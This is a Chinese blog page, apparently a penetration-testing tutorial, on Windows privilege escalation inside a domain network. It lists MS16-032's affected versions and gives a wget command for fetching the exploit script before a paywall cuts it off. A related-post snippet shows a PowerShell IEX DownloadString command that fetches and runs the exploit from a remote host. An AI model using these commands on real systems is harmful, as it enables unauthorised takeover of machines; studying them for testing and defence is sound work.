2021-09-25 内网域渗透低权限提权(五-1)

最新推荐文章于 2024-03-31 10:11:28 发布
最新推荐文章于 2024-03-31 10:11:28 发布
阅读量341 收藏
点赞数
文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51170293/article/details/120578411
版权

咕咕咕。。。
提权目的:低权限到高权限,从而扩大战果
手段

  1. 本地溢出漏洞提权(未打补丁前提下)
  2. 数据库提权
  3. 第三方软件提权(向日葵,teamview~)
    在这里插入图片描述

1本地溢出漏洞提权:用户输入的数据超过了缓存区的长度
ms16-032漏洞,这个漏洞是16年发布的,版本对象是
以普通用户的身份添加administrator以system权限运行程序
条件:目标机要有两个以上的cpu核心,并且powershell是v2.0及更高版本
Windows Vista
Windows 7
Windows 8.1
Windows 10
Windows 2008 Server
Windows 2012 Server
利用步骤:
1下载ps1文件
wget https://raw.githubusercontent.com/Ridter/Pentest/master /powershell/MyShell/Invoke-MS16-032.ps1
ps:linux中wegt、apt-get、pip三种安装命令的区别的博客:

https://blog.csdn.net/weixin_43286092/article/details/102095209

2设置执行策略:任何powershe

最低0.47元/天 解锁文章
白鹿0820
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
2021-09-27 内网渗透权限提权-3 用metasploit,cobaltstrike来辅助提权
m0_51170293的博客
10-02 426
(๑•⌄•๑) 3借用metasploit,cobaltstrike来辅助提权 ps: Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权
渗透内网提权
hackzkaq的博客
11-12 2667
搜索公众号:白帽子左一,领配套练手靶场,全套安全课程及工具 在windows中,权限种类还是比较多,但我们涉及到的基本就三个 User(普通用户权限)、Administrator(管理员权限)和system(系统权限) 一、提权方法 常用的提权方法 系统内核溢出提权 数据库提权 错误的系统配置提权 组策略首选项提权 DLL劫持提权 滥用高权限令牌提权 第三方软件/服务提权 二、内核溢出提权 电脑里的数据就好比水缸里的水,正常情况下水满了就不会在向水缸里注水 如果继续注入,水就会溢出到外界从而污染外界
内网渗透环境探索和简单提权
最新发布
m0_70349048的博客
03-31 353
因为控可以登录内所有管辖的主机,因此登录过程中的密码会被记录下来,即winlog进程把密码拿到,发给后面的lasss,然后还会进行hash加密保存到SAM中。假如我么已经拿下了一个普通主机,想要登录权限更大的控,我们的目的就是获取控的密码,明文更好,hash后的也能用。内主机就作为普通的机器,只有普通的权限,一般我们拿下跳板机之后,就会拿下普通的主机,然后想办法提权或者进入控。控服务器是管理环境的,相当于“领导”,可以划分,提供服务,并且可以登录内的任何一台机器。
渗透提权入门练习(MS14-068)
ai_64的博客
04-09 555
一、漏洞说明 微软在2014年11月18日发布了一个紧急补丁,修复了一个影响全部版本Windows服务器的严重漏洞。该补丁用于解决Microsoft Windows Kerberos KDC漏洞(CVE-2014-6324),该漏洞允许黑客提升任意普通用户权限成为管理员(Domain Admin)身份。也就是说,你在一台普通用户的机器上利用这个漏洞,那么这个用户就变成管理员权限,然后,该...
渗透 | 利用DnsAdmins提权到SYSTEM
Ms08067安全实验室
04-12 975
文章来源|MS08067 公众号读者投稿本文作者:VastSky(Ms08067实验室读者)一、前言 在渗透中,我们获得DNS管理员(DNSAdmin)权限后,可以使用dnscmd.e...
[内网渗透]—kerberos&提权(pth、wmic)
Sentiment的博客
12-08 472
在 Kerberos 认证中,最主要的问题是如何证明「你是你」的问题,如当一个 Client 去访问 Server 服务器上的某服务时,Server 如何判断 Client 是否有权限来访问自己主机上的服务,同时保证在这个过程中的通讯内容即使被拦截或篡改也不影响通讯的安全性,这正是 Kerberos 解决的问题。在渗透过程中 Kerberos 协议的攻防也是很重要的存在。Kerberos 主要是用在环境下的身份认证协议。PsExec是SysInternals套件中的一款强大的软件。
完整的内网渗透-暗月培训之项目六1
08-03
1. 环境介绍3 2. 信息收集3 3. 对网站进行安全检测4 5. 跨网段渗透15
C# 公网-网网聊天 ,客户端服务器通讯
02-25
公网-网网 ,UDP 通讯,可群发, 如果是放公网,将服务器放在公网,客户端可在局网!
内网渗透文档过程有截图
07-02
内网渗透文档过程 本资源总结了内网渗透测试的整个过程,从设置虚拟机网络环境到生成 payload 并进行渗透测试。下面是本资源中所涉及的知识点: 1. 虚拟机网络环境设置:在 VMware 中设置虚拟机网络环境,使用...
内网渗透思维导图指北
10-04
内网渗透思维导图指北
edu-2016-github-based-lab:连结网
04-30
GitHub-based Experimental Teaching 基于GitHub平台的协同式实验教学方法[J]. 计算机教育, 2016(12):144-148. Connected domain:
Mysql漏洞利用(越权,实战怎么从权限拿到root密码)
07-30
Mysql漏洞利用(越权,实战怎么从权限拿到root密码)
2019 K8最新渗透测试工具集合.zip
05-22
K8信息安全工具包功能有: K8浏览器 K8木马病毒后门监视器 K8_VBS提权脚本免杀生成器 K8破壳SMTP K8正方密码解密工具 破文生成 搜索引擎 加密解密 在线翻译渗透命令 渗透工具 系统加强 网吧攻防 小红伞 漏洞 EXP 网络安全检测 必备的综合工具
渗透笔记-ADCS 提权-ESC1
NoooEmotion的博客
02-02 1453
AD CS(Active Directory 证书服务)中的企业CA使用证书模板定义设置颁发证书,这些证书模板是注册策略和预定义证书设置的集合,并包含诸如此证书的有效期是多长?、证书的用途是什么?、主题是如何指定的?、谁可以申请证书?,以及无数其他设置。证书模板有一组特定的设置,这使得它们非常容易受到攻击。
内网渗透(三十)之横向移动篇-利用远控工具向日葵横向移动
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-15 800
向日葵远程控制软件是一款免费的集远程控制电脑/手机/平板、远程桌面连接、远程开机、远程管理、支持内网穿透的一体化远程控制管理工具软件,且还能进行远程文件传输、远程摄像头监控等。支持系统:Winodws/Linux/MacOS/Android/iOS。
内网中入侵linux系统,MSSQL 入侵提权内网渗透案例分析
weixin_42533622的博客
05-15 148
图文:udb311主题:MSSQL内网渗透案例分析发表:黑白前线描述:对于内网渗透技术一直感觉很神秘,手中正巧有一个webshell是内网服务器。借此机会练习下内网入侵渗透技术!本文敏感信息以屏蔽!密码都以*号代替。此次过程主要运用到xp_cmdshell恢复与执行,再通过自己的灵活思维运用。环境:2003 SERVERIIS :6.0 支持php数据库:MSSQL和MYSQL网站类型:ASPX本...
内网渗透——权限提升
cldimd的博客
03-23 732
提权目的: 有时候,通过某些方式(如上传Webshell)获取执行命令的shell,但是会因为权限限制而无法执行某些命令。这时候为了“扩大战果”就需要利用提权,来让原本的权限(如只允许列目录)-->高权限(拥有修改文件的能力)。 提权方式: 本地漏洞提权 数据库提权 第三方软件提权 本地漏洞提权window...
第一章 提权基础
density__的博客
09-26 346
提权是整个黑客攻防过程中最难的一个环节。对于渗透来说,获取的权限越高,控制的服务器权限越多。在整个渗透流程中,提权过程汇聚了思路,技巧,工具和技术。本章主要介绍各种提权的基础知识,主要包括如何提权,如何破解Windows及LInux的密码,一些后门工具的使用,对提权工具的免杀处理,以及端口转发和代理工具的使用 本章主要内容: 提权概述 Windows账户和密码的获取与破解 使用John the Ripper破解LINUX密码 Linux提权辅助工具Linux ...
windows提权总结
qq_44657899的博客
01-15 4000
文章目录0x01 使用ms16-032提权 0x01 使用ms16-032提权 exp地址: https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1 powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.8.12/Invoke-MS16-03
内网控信息需要收集哪些
03-31
1.名(Domain Name) 2.控制器IP地址(Domain Controller IP Address) 3.管理员账户信息(Domain Administrator Account Information) 4.控制器操作系统信息(Domain Controller Operating System ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值